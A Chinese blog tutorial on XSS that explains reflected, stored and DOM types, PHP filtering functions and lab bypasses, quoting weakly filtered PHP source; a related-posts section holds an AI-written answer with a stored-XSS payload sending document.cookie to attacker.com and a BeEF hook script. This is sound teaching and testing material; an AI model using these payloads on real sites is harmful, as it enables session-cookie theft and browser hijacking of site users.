XSS漏洞及复现

最新推荐文章于 2025-03-22 01:32:43 发布
最新推荐文章于 2025-03-22 01:32:43 发布
阅读量1.5k 收藏 10
点赞数
文章标签: xss 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39744805/article/details/132631112
版权
本文详细介绍了XSS攻击的概念、反射性、存储型和DOM型的分类,以及相应的防范方法,如使用PHP的过滤函数和HTML实体转义。还通过实例展示了如何在PHP代码中实施安全措施防止XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、什么是XSS

跨站脚本( Cross-site Scripting )攻击,攻击者通过网站输入框输入payload(脚本代码 ),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的( 窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML语言中的CSS相混淆,通常称它为“XSS”。

二、XSS的分类

反射性

特点:只执行一次,非持久型

主要存在于攻击者将payload附加到url的参数中,服务端没有经过严格的过滤输出到用户浏览器中,导致恶意代码被执行。

防范思路

可以使用str_replace()函数区分大小写

preg_replace() 利用正则过滤标签(<script>)

htmlspecialchars(string) 将"<",">","&"等转化为html实体,防止浏览器将其作为html元素

靶场复现

输入<script>alert(1)</script>测试发现只输出了alert(1)

查看源码得知,过滤了<script>标签,将script换成大写的SCRIPT,或者将标签换成<img>即可

存储型

特点:持久型

主要存在于攻击者将恶意脚本存储到服务器数据库中,当用户访问包含恶意相关数据的页面时,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。

防范思路

trim(string[,charlist]) 移除字符串两侧的空白字符或预定义字符(\t,\n,\x0B,\r)

stripslashes(string) 移除字符串中的反斜杠

strip_tags(string,allow) 剥去字符串中的html、xml以及php的标签

靶场复现

在尝试<script>alert(1)</script>后,输出为alert(1)

查看源码发现对<script>标签进行了过滤,尝试换成大写或者使用别的标签进行注入

<?php
 
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
 
    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
 
    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
 
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 
    //mysql_close();
}
 
?>

dom型

特点:通过JavaScript操作document,实现dom树的重构

简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOM型xss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOM型xss也可以理解为反射性xss。

DOM型与反射型和存储型的区别

前面两种都将数据提交到后台处理,但是dom直接在客户端执行

DOM型xss可以在前端通过js渲染来完成数据的交互,达到插入数据造成xss脚本攻击,且不经过服务器,所以即使抓包无无法抓取到这里的流量,而反射性与存储型xss需要与服务器交互,这便是三者的区别。

 靶场复现

url栏里的default参数可修改

查看源代码,发现对<script>标签进行了不区分大小写的查找,并将结果返回为default=English,所以不使用script标签

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
	$default = $_GET['default'];
	
	# Do not allow script tags
	if (stripos ($default, "<script") !== false) {
		header ("location: ?default=English");
		exit;
	}
}

?>

使用img标签后发现并无弹窗

查看网页源代码发现需要闭合标签

重新输入

XSS漏洞复现(CVE-2017-12794)
m0_56578216的博客
08-30 597
前提条件:1.
DVWA——XSS注入复现
qq_62056583的博客
07-13 2020
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
XSS复现
nixiaoge的博客
08-18 1369
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
存储型XSS_简单漏洞复现
CHUNJIUJUN的博客
08-10 490
首先随便注册一个账号登录 写一篇邮件,邮件内容插入xss语句 burpsuit抓包,发送到repeater,放包,发现script被过滤了 所以改包改用<img src=1 onpointerout=alert(123)> 这里我们去看看我们发布的内容是否双击以后有弹窗 弹窗出现,说明有xss漏洞 ...
XSS漏洞靶场---(复现
weixin_74984440的博客
03-22 874
在这段代码中,$str 变量接收用户输入的 keyword 参数,经过一系列处理后存储在 $str3 中,而 $str3 被直接嵌入到 HTML 表单的 input 标签的 value 属性中,没有进行足够的 HTML 实体转义,这就为 XSS 攻击提供了可能。虽然在 <h2> 标签中使用了 htmlspecialchars 对输出进行转义,但在 <input> 标签的 value 属性中,使用的是经过 str_replace 处理后的 $str3,没有再次进行全面的转义,这就给攻击者留下了可乘之机。
pikachu之xss漏洞复现
m0_54024658的博客
05-24 819
xss跨站脚本xss简介xss漏洞类型反射型存储型DOM型XSS攻击过程漏洞复现反射型XSS(get)存储型XSSDOM型XSS xss简介 XSS(跨站脚本)是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞类型 反射型 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型 交互的数据会被存在数据库里面,
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2572
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
XSS漏洞复现
m0_65665796的博客
08-17 1372
不知道我是什么原因toLowerCase这个函数用不了,但是eval(mafia)我也可以利用,location的作用前面的关卡已经说到了,slice(1)从后往前截取第一个。我们看到这一关过滤了很多,最主要过滤了/alert/,但是他没有过滤大写,但是html是严格区分大小写的,这就很头疼,但是想到了官方给出了这么一个函数Function.结果发现并没有对28,29进行编码 ,是什么原因呢是不是把它当成一整字符串了,所以没有编码通过查资料得知payload,查了location的用法是。
复现XSS漏洞及分析
qq_61739597的博客
09-01 3481
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
xss漏洞复现
h2896713787的博客
11-10 6187
xss
XSS漏洞复现(包括xssgame和三个高级xss漏洞
qq_63890458的博客
08-17 1270
复现xss游戏里的8个简单模式,并且写有大概解题思路过程及原理。此外,还复现了两个DOM破坏的高级xss漏洞,利用的技巧很多,前端这种弱编程的变化太多了,原理性太不规律,需要很深的底层代码理解,才能找到漏洞,大家加油吧。
漏洞复现--xss
weixin_52351575的博客
01-11 959
切换至Attack机,即我们的攻击机,然后来到火狐浏览器,即攻击方,当受害者用户点击“XSS(Stored)”之后,XSS平台会有一条消息,刷新,查看“接受面板”,发现多了一个数据,这就是我们受害者用户的一个数据,在这里面我们可以看到受害者的cookie,如下图。选择公共模板,在“default.js”下,修改模板,将“http://网站地址”修改为“http://10.1.1.200/xss/index.php”,修改完成之后点击“修改”,如下图。
Appcms存储型XSS漏洞复现
钟言的博客
03-10 5060
本篇为Appcms存储型XSS漏洞复现,采用多次注入的方式完成我们的payload注入,详细内容包含了环境介绍环境部署测试回显四、多次注入 1、第一条评论 2、第二条评论 3、管理员登录查看五、编写脚本获取cookie等内容
实战XSS漏洞复现
最新发布
04-02
<think>好的,我需要帮助用户了解如何复现XSS漏洞以进行安全测试。首先,我得整理XSS的基本概念,确保用户明白漏洞的原理。根据提供的引用,XSS分为反射型、存储型和DOM型,这点要明确。 接下来,复现步骤需要详细分点。用户可能需要知道如何搭建测试环境,比如使用PHPStudy或者Docker,引用中的例子提到了本地服务器,可以引用相关部分。然后构造测试Payload,引用里提到了<script>alert(1)</script>和更隐蔽的console.log(1),这些例子需要包含进去,并说明不同场景下的应用。 实例分析部分,用户可能想知道具体的漏洞复现过程。比如反射型XSS,根据引用中的URL示例,需要展示如何构造恶意链接,并解释参数如何触发漏洞。存储型XSS则要举例用户输入如何被保存并显示给其他用户,引用中的PHPmyWind案例可以作为例子,但用户提供的引用中没有详细说明,可能需要参考已有的信息。 工具使用方面,BeEF框架在引用中被提到用于获取Cookie,这部分要介绍工具的作用和基本使用方法,帮助用户了解如何利用工具进行深入利用。 防御措施也是重要的一环,用户可能想知道如何预防XSS,引用中提到输入验证、过滤和转义,需要强调这些方法,并建议使用安全的编码函数。 最后,生成相关问题,确保覆盖用户可能进一步提问的方向,比如不同XSS类型的区别、工具推荐、防御方法以及实际漏洞案例。需要检查引用标记是否正确,每个步骤都自然引用对应的来源,避免遗漏。 整个过程要保持语言简洁,步骤清晰,符合用户要求的格式,使用中文,并且正确应用LaTeX格式。同时注意不要使用Markdown,用自然的分段和标号。检查是否有遗漏的引用,确保每个引用标记对应正确的来源,比如复现步骤中的实例分析引用正确的示例链接。</think>### XSS漏洞复现方法及实例分析 #### 一、XSS漏洞基础 XSS(跨站脚本攻击)通过注入恶意脚本代码到网页中,利用用户浏览器执行非法操作。根据攻击方式可分为以下三类: 1. **反射型XSS**:恶意脚本通过URL参数注入,服务器直接返回未过滤的内容[^1]。 2. **存储型XSS**:恶意脚本存储到服务器数据库,其他用户访问时触发[^2]。 3. **DOM型XSS**:完全由客户端JavaScript解析漏洞导致,不经过服务器处理[^1]。 --- #### 二、复现步骤与实例 ##### 1. 搭建测试环境 - **本地环境**:使用PHPStudy或Docker搭建Web服务器(如引用示例中的`http://localhost:8080`[^3])。 - **目标页面**:选择存在输入输出交互的页面(如留言板、搜索框)。 ##### 2. 构造测试Payload - **基础测试**: ```html <script>alert(1)</script> <!-- 触发弹窗 --> ``` - **隐蔽测试**: ```javascript console.log(1) <!-- 控制台输出,避免弹窗引起注意[^4] --> ``` - **编码绕过**: 使用URL编码或HTML实体编码绕过简单过滤: ```url http://localhost:8080/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 [^3] ``` ##### 3. 实例分析:反射型XSS复现 1. **目标URL**:假设存在搜索功能页面`search.php?keyword=test`。 2. **注入Payload**: ```url http://localhost:8080/search.php?keyword=<script>alert(document.cookie)</script> ``` 3. **触发漏洞**:服务器未过滤参数直接返回页面,脚本执行并泄露Cookie[^5]。 ##### 4. 存储型XSS复现(以留言板为例) 1. **提交恶意内容**: ```html <script>fetch('http://attacker.com/steal?data=' + document.cookie)</script> ``` 2. **持久化存储**:恶意脚本保存到数据库。 3. **其他用户访问**:加载留言时自动发送Cookie到攻击者服务器[^2]。 ##### 5. 工具辅助利用 - **BeEF框架**:用于控制受害者浏览器,执行高级攻击(如截图、键盘记录): ```bash # Kali中启动BeEF beef-xss ``` 注入Payload: ```html <script src="http://<beef_server>:3000/hook.js"></script> ``` --- #### 三、防御措施 1. **输入过滤**:过滤`<script>`、`onerror`等危险标签/属性。 2. **输出转义**:使用HTML实体编码(如`<`转为`<`)[^2]。 3. **CSP策略**:通过HTTP头限制脚本来源。 4. **安全函数**:PHP中可用`htmlspecialchars()`,JavaScript中避免`innerHTML`。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值